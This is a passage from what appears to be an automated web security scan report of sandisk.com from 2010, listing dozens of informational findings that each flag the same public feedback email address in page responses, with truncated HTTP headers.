Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.117. http://www.sandisk.com/business-solutions/usb-flash-drives.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/usb-flash-drives.aspx

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37014
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.118. http://www.sandisk.com/business-solutions/usb-flash-drives/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/usb-flash-drives/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37010
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.119. http://www.sandisk.com/business-solutions/usb-flash-drives/clear-case-ufd.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/usb-flash-drives/clear-case-ufd.aspx

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.120. http://www.sandisk.com/business-solutions/usb-flash-drives/core-module previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/usb-flash-drives/core-module

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36384
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.121. http://www.sandisk.com/business-solutions/usb-flash-drives/core-module.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/usb-flash-drives/core-module.aspx

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36389
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.122. http://www.sandisk.com/consumer-products previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/consumer-products

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19800
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.123. http://www.sandisk.com/consumer-products/camcorder previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/consumer-products/camcorder

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40474
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.124. http://www.sandisk.com/consumer-products/camera previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/consumer-products/camera

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40733
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.125. http://www.sandisk.com/consumer-products/computing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/consumer-products/computing

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41062
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.126. http://www.sandisk.com/consumer-products/computing/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/consumer-products/computing/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41063
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.127. http://www.sandisk.com/consumer-products/computing/ssd-landing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/consumer-products/computing/ssd-landing

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34308
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.128. http://www.sandisk.com/consumer-products/dslr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/consumer-products/dslr

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40829
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.129. http://www.sandisk.com/consumer-products/gaming previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/consumer-products/gaming

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39989
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.130. http://www.sandisk.com/consumer-products/mobile-memory previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/consumer-products/mobile-memory

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39931
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.131. http://www.sandisk.com/consumer-products/music-player previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/consumer-products/music-player

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42311
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.132. http://www.sandisk.com/css/MediaPlayer_img/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/css/MediaPlayer_img/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.133. http://www.sandisk.com/flash/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/flash/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.134. http://www.sandisk.com/global-sites previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/global-sites

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15922
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.135. http://www.sandisk.com/homepage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/homepage

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28452
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.136. http://www.sandisk.com/media/100759/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/media/100759/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.137. http://www.sandisk.com/media/100764/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/media/100764/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.138. http://www.sandisk.com/media/100769/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/media/100769/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.139. http://www.sandisk.com/media/100774/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/media/100774/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.140. http://www.sandisk.com/media/27670/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/media/27670/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.141. http://www.sandisk.com/media/27675/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/media/27675/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.142. http://www.sandisk.com/media/27685/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/media/27685/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.143. http://www.sandisk.com/media/27690/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/media/27690/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.144. http://www.sandisk.com/media/27695/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/media/27695/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.145. http://www.sandisk.com/media/407994/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/media/407994/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.146. http://www.sandisk.com/media/745047/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/media/745047/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.147. http://www.sandisk.com/misc/404error previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/misc/404error

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12579
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.148. http://www.sandisk.com/products/camcorder/sandisk-extreme-hd-video-sdhc-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/camcorder/sandisk-extreme-hd-video-sdhc-cards

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.149. http://www.sandisk.com/products/camcorder/sandisk-video-hd-sdhc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/camcorder/sandisk-video-hd-sdhc

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.150. http://www.sandisk.com/products/computing-products/sandisk-cruzer-blade-usb-flash-drive previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/computing-products/sandisk-cruzer-blade-usb-flash-drive

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.151. http://www.sandisk.com/products/computing-products/sandisk-solid-state-drive previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/computing-products/sandisk-solid-state-drive

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.152. http://www.sandisk.com/products/computing-products/sandisk-ultra-backup-usb-flash-drive previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/computing-products/sandisk-ultra-backup-usb-flash-drive

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.153. http://www.sandisk.com/products/dslr/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51591
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.154. http://www.sandisk.com/products/dslr/sandisk-extreme-compactflash-card previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-extreme-compactflash-card

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.155. http://www.sandisk.com/products/dslr/sandisk-extreme-iv-compactflash previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-extreme-iv-compactflash

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.156. http://www.sandisk.com/products/dslr/sandisk-extreme-pro-compactflash-card previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-extreme-pro-compactflash-card

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.157. http://www.sandisk.com/products/dslr/sandisk-extreme-pro-compactflash-card.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-extreme-pro-compactflash-card.aspx

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.158. http://www.sandisk.com/products/dslr/sandisk-extreme-sdhc-cards- previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-extreme-sdhc-cards-

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.159. http://www.sandisk.com/products/dslr/sandisk-ultra-compact-flash previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-ultra-compact-flash

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

3.160. http://www.sandisk.com/products/dslr/sandisk-ultra-ii-compactflash previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/products/dslr/sandisk-ultra-ii-compactflash

Issue detail

The following email address was disclosed in the response:

sitefeedback@sandisk.com

Request

Response

